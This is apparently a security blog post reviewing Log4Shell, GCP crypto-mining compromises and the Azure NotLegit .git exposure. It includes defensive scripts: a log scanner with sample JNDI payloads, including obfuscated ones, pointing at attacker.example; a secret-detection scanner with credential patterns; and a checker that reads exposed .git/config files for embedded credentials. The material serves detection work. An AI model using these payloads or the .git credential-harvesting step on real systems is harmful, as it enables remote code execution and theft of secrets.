By Tony Thomas and Sean Whiting
2021 kept cybersecurity professionals busy, from the fallout of SolarWinds at the start of the year to Log4j at its close. By March of 2021, there were 1,291 breaches recorded, 95% of which were attributed to human error. In this article we look at three specific security events and the lessons they hold: Log4Shell, compromised Google Cloud accounts used for cryptocurrency mining, and a four-year-old bug in Azure App Service. Taking the time to reflect on these events can help organizations prepare for the challenges, trends, and events of 2022.
Understanding the Log4j Vulnerability
The zero-day Log4j vulnerability, known as Log4Shell (CVE-2021-44228), was one of the most critical vulnerabilities in years and received the maximum CVSS score of 10.0. The flaw sits in Log4j 2's message lookup feature: when a logged string contains a ${jndi:...} lookup, the library resolves it by contacting the LDAP (or other JNDI) server named in the string, which an attacker can use to make the application load and execute code from a server they control. Because attackers control much of what applications log (HTTP headers, usernames, search terms), exploitation required little more than sending a crafted string and waiting for it to be logged. Log4j's presence throughout the Java ecosystem, often as a transitive dependency that teams did not know they shipped, made the vulnerability exceptionally critical. (We explore this vulnerability and how to address it in more detail in a separate blog post.)
Lesson Learned: Get Back to the Basics
Vulnerabilities inherited through the software supply chain call for layered mitigation. First, go back to security basics. An application that is not reachable from the internet cannot be probed directly by outside attackers. This is security 101: do not expose an application publicly unless it must be. Log4Shell added a caveat, though: because the trigger is any attacker-controlled string that gets logged, an internal service can still be hit by data forwarded from an internet-facing one (a user-agent header, a username), so reducing exposure has to be paired with egress filtering, since the exploit also needs the vulnerable host to make an outbound connection to the attacker's server. It also showed the value of a dependency inventory: teams that could quickly answer "where do we run Log4j?" patched first. Second, a zero-trust network design limits what a compromised account or a foothold on the internal network can reach. Finally, application segmentation ensures that compromised infrastructure for one application does not impact another. None of these lessons is new, but Log4j was a forceful reminder of how the basics shrink an organization's attack surface and its susceptibility to lateral movement.
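One reason Log4Shell was hard to hunt for in logs is that attackers hid the string "jndi" inside nested lookups, so a plain substring search missed most probes. The following Python script is an added example for this article (not code from the Log4j project or from the original post): it walks access-log lines, collapses the nested lookups attackers used for obfuscation the way Log4j's substitution would, and flags any line that resolves to a ${jndi:...} lookup. The sample log lines and the attacker.example hostname are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Innermost Log4j 2 lookup: a ${...} whose body contains no further $, { or }.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve(inner: str) -> str:
    """Emulate the lookups attackers used to hide the string 'jndi'.

    Only the ':-' default syntax and the lower/upper lookups are emulated;
    every other lookup resolves to the empty string, which is conservative:
    it strips the decoy and lets the outer lookup surface on the next round.
    """
    if ":-" in inner:                      # ${::-j}, ${env:NOPE:-j} -> "j"
        return inner.split(":-", 1)[1]
    prefix, sep, rest = inner.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return rest.lower()
    if sep and prefix.strip().lower() == "upper":
        return rest.upper()
    return ""


def is_log4shell_probe(line: str, max_rounds: int = 20) -> bool:
    """True if the line carries a ${jndi:...} lookup, plain or nested/obfuscated."""
    s = unquote(line)                      # web servers often log the request URL-encoded
    for _ in range(max_rounds):
        hits = list(_LOOKUP.finditer(s))
        if not hits:
            return False
        if any(m.group(1).lstrip().lower().startswith("jndi:") for m in hits):
            return True
        # No jndi yet: collapse the innermost lookups and look again.
        s = _LOOKUP.sub(lambda m: _resolve(m.group(1)), s)
    return False


def scan_log(lines):
    """Return (line_number, line) for every log line that carries a probe."""
    return [(i, ln) for i, ln in enumerate(lines, 1) if is_log4shell_probe(ln)]


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://attacker.example/a}"',
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '198.51.100.7 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 "-"',
    '10.0.0.9 - - "GET /report?d=${date:yyyy} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for n, ln in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ln}")
```

The script URL-decodes each line once and only emulates the lower, upper and ":-" default lookups; anything else resolves to an empty string, which is enough to expose the jndi lookup that the decoys wrap. Run it over proxy, WAF and application logs from December 2021 onward, and treat hits on hosts that later made unexpected outbound LDAP connections as the priority for incident response.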
Preventing Google Cloud Platform Account Crypto Mining
Also in 2021, Google's Cybersecurity Action Team (CAT) published an analysis of compromised Google Cloud Platform (GCP) accounts and how they were being used to mine cryptocurrency. Of the 50 recently compromised instances they reviewed, 86% were used for crypto mining, and nearly half of the compromises traced back to weak or no passwords on user accounts or API connections. Their analysis concluded that the compromises occurred "due to poor hygiene and a lack of basic control implementation." GCP and the other major cloud service providers (CSPs) have made real headway with their native misconfiguration management tools (e.g., Google's Security Command Center), but misconfigurations and leaked credentials still run rampant.
Lesson Learned: Invest in Key Vaults
Leaked credentials remain a problem because employees still commit them to GitHub, leave them on sticky notes, and practice poor password hygiene in general. There is little excuse for this when every major cloud offers a native secrets store (Google Secret Manager, AWS Secrets Manager, Azure Key Vault, or a self-hosted option such as HashiCorp Vault). A key vault stores credentials and secrets (API keys, certificates, cryptographic keys, and passwords) encrypted at rest, limits access to explicitly authorized identities through IAM, and logs every read, so a leaked value can be traced and revoked. Application code then fetches the secret at runtime by reference instead of carrying it in source or configuration files. Vaults are also more efficient: rotation can be automated, which saves time and removes the need to manually change every password and key across systems.
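Vaults only help if secrets stop landing in repositories in the first place, so the control that pairs with them is scanning what developers are about to commit. The Python scanner below is an added example (not from the original post and not a Google or GitHub tool): it applies rules for the credential formats most relevant to the GCP cases discussed here, a service-account key JSON, AWS access keys, PEM private keys and GitHub tokens, plus a generic "password = ..." rule gated by a placeholder check and a Shannon-entropy threshold so references to a vault or environment variable are not flagged. The sample files are constructed for the demonstration; the AWS values are the placeholder credentials published in AWS's own documentation.

```python
import math
import re
from dataclasses import dataclass

# Each rule: name, compiled pattern, and whether the matched value must also pass
# the placeholder/entropy filter (only the generic assignment rule needs it).
RULES = [
    ("aws_access_key_id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"), False),
    ("gcp_service_account_key", re.compile(r'"private_key_id"\s*:\s*"[0-9a-f]{40}"'), False),
    ("pem_private_key", re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH |)PRIVATE KEY-----"), False),
    ("github_token", re.compile(r"\bghp_[A-Za-z0-9]{36}\b"), False),
    ("generic_assignment",
     re.compile(r"(?i)\w*(?:password|passwd|pwd|secret|api[_-]?key|token)\w*\s*[:=]\s*['\"]?([^'\"\s]{8,})"),
     True),
]

# Values that reference a vault, environment variable or template are not leaks.
PLACEHOLDER_PREFIXES = ("os.environ", "os.getenv", "process.env", "${", "{{", "<", "ENV[", "secretmanager", "vault:")


@dataclass
class Finding:
    path: str
    line: int
    rule: str
    redacted: str


def shannon_entropy(s: str) -> float:
    """Bits per character; random credentials usually score well above 3.5."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def _redact(value: str) -> str:
    """Keep a 4-character prefix so the owner can recognise the secret, hide the rest."""
    return value[:4] + "*" * max(0, len(value) - 4)


def scan_text(path: str, text: str, entropy_threshold: float = 3.5):
    """Scan one file's contents; returns a list of Finding objects."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern, needs_filter in RULES:
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(1) if m.groups() else m.group(0)
            if needs_filter:
                if value.startswith(PLACEHOLDER_PREFIXES):
                    continue
                if shannon_entropy(value) < entropy_threshold:
                    continue
            findings.append(Finding(path, lineno, name, _redact(value)))
    return findings


def scan_files(files):
    """files: mapping of path -> contents (e.g. the staged files in a pre-commit hook)."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed sample "staged files". The AWS values are the example credentials
# from AWS's documentation; everything else is made up for this demonstration.
SAMPLE_FILES = {
    "config/settings.py": (
        'DB_HOST = "db.internal.example"\n'
        'db_password = "Tr0ub4dor&3xY9qLm2"\n'      # hard-coded secret: flagged
        'api_key = os.environ["API_KEY"]\n'          # env/vault reference: not flagged
    ),
    "deploy/.env": (
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "sa-key.json": (
        '{\n  "type": "service_account",\n'
        '  "private_key_id": "0123456789abcdef0123456789abcdef01234567",\n'
        '  "private_key": "-----BEGIN PRIVATE KEY-----\\nMIIE...\\n-----END PRIVATE KEY-----\\n"\n}\n'
    ),
    "README.md": "Set DB_PASSWORD in Secret Manager; never commit it.\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line} {f.rule} {f.redacted}")
```

Wired into a pre-commit hook or a CI step, a scanner like this blocks the commit and points the developer at the vault instead; the entropy gate keeps it from firing on "changeme" style defaults and test fixtures, which is what makes developers tolerate it. It complements, rather than replaces, the provider-side scanning GitHub and the CSPs perform after a push, by which time the secret has already left your control and should be rotated regardless.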
Also, this is your regular reminder to enforce MFA for all your cloud users, administrative accounts included. If your organization has not done that, please stop reading this post and go take care of it.
Mitigating the Azure App Bug
Lastly, in 2021 a security flaw was reported in Microsoft Azure App Service (the Wiz researchers who found it named it NotLegit). The kicker? It had existed since 2017. Applications written in PHP, Node, Python, Ruby, and Java that were deployed with the Local Git option had their .git directory placed inside the publicly served web root, so the flaw could expose the source code of customer applications. All a malicious actor had to do was request the /.git directory from the target app (starting with /.git/HEAD and following the references to the object files) and reconstruct the repository. That could yield credentials stored in the source code or enable further targeted attacks after analysis of the code.
Lesson Learned: Monitor, Monitor, Monitor
Microsoft advised developers and administrators to consistently review and limit cloud services that have external IPs. In this case there was no customer misconfiguration to fix; the insecure behavior was the platform's default, which is a good reminder of the risk inherent in cloud services. Cloud security monitoring can help detect malicious activity against your applications, and a simple self-check (requesting /.git/HEAD on your own public apps and confirming you get a 403 or 404) belongs in any periodic external scan. Organizations should also configure notifications for the security bulletins their CSPs publish. Attackers are always watching for vulnerabilities and race to exploit them as soon as they are disclosed; defenders must apply patches with the same vigilance.
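The self-check mentioned above has one trap: many apps answer 200 with their index page for any unknown path, so status codes alone produce false positives. The Python script below is an added example (not Microsoft's or Wiz's tooling): it fetches /.git/HEAD, verifies that the body actually looks like a git HEAD file, and, only if the repository is exposed, parses /.git/config for remote URLs that embed credentials, which is exactly the kind of secret this bug leaked. The hostnames and responses in _FAKE_SITES are constructed so the script runs offline; http_fetch is the real fetcher, to be pointed only at hosts you are authorized to test.

```python
import re
from urllib.parse import urlsplit
from urllib.request import urlopen
from urllib.error import HTTPError, URLError

# .git/HEAD is either a symbolic ref or a bare object id (40-hex SHA-1 or 64-hex SHA-256).
_HEAD_RE = re.compile(r"^(?:ref: refs/[\w./-]+|[0-9a-f]{40}|[0-9a-f]{64})\s*$")
# "url = ..." lines inside the [remote "..."] sections of .git/config
_REMOTE_URL_RE = re.compile(r"^\s*url\s*=\s*(\S+)", re.MULTILINE)


def looks_like_git_head(body: str) -> bool:
    """A 200 alone proves nothing (SPAs return index.html for every path);
    the body has to look like a real HEAD file."""
    return bool(_HEAD_RE.match(body.strip()))


def remotes_with_credentials(config_text: str):
    """Remote URLs from .git/config that embed user:password@ credentials, redacted."""
    leaked = []
    for url in _REMOTE_URL_RE.findall(config_text):
        parts = urlsplit(url)
        if parts.username or parts.password:
            # Redact before the URL ends up in a ticket or a log.
            leaked.append(url.replace(parts.netloc, f"***@{parts.hostname}"))
    return leaked


def check_git_exposure(fetch, base_url: str) -> dict:
    """fetch(url) -> (status, body_text). Probes HEAD first; reads config only if HEAD is real."""
    result = {"target": base_url, "exposed": False, "head": None, "leaked_remotes": []}
    status, body = fetch(base_url.rstrip("/") + "/.git/HEAD")
    if status != 200 or not looks_like_git_head(body):
        return result
    result["exposed"] = True
    result["head"] = body.strip()
    status, cfg = fetch(base_url.rstrip("/") + "/.git/config")
    if status == 200:
        result["leaked_remotes"] = remotes_with_credentials(cfg)
    return result


def http_fetch(url: str, timeout: float = 5.0):
    """Real fetcher for your own hosts. Returns (status, first 4 KiB of body)."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except HTTPError as e:
        return e.code, ""
    except URLError:
        return 0, ""


# Constructed offline responses standing in for hypothetical App Service hosts.
_FAKE_SITES = {
    "https://exposed-app.example/.git/HEAD": (200, "ref: refs/heads/master\n"),
    "https://exposed-app.example/.git/config": (
        200,
        '[core]\n\trepositoryformatversion = 0\n'
        '[remote "origin"]\n\turl = https://deploy:s3cr3t-token@git.example.com/team/app.git\n'
        '\tfetch = +refs/heads/*:refs/remotes/origin/*\n',
    ),
    # Single-page app: answers 200 with its index.html for any unknown path.
    "https://spa-app.example/.git/HEAD": (200, "<!doctype html><html><body>app</body></html>"),
}


def fake_fetch(url: str):
    return _FAKE_SITES.get(url, (404, ""))


if __name__ == "__main__":
    for host in ("https://exposed-app.example", "https://spa-app.example", "https://patched-app.example"):
        print(check_git_exposure(fake_fetch, host))
```

Swap fake_fetch for http_fetch to run the check against your own inventory of public endpoints, and schedule it alongside the external scan: an exposed HEAD means the whole history can be pulled with an off-the-shelf repository dumper, so treat any hit as a credential-rotation event, not just a configuration ticket.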
These three cybersecurity events from 2021 illustrate the range of risk that internal Commercial-Off-the-Shelf (COTS) and open-source components, cloud misconfigurations, and imperfections in the cloud services themselves present to developers and organizations. So, let's kick off 2022 with an important reminder: embrace the basics. Limit externally facing applications, enforce MFA, monitor vendor bulletins, patch with urgency, and work through your misconfiguration backlog. With these core practices in place, organizations will be well armed to meet the challenges and threats of 2022.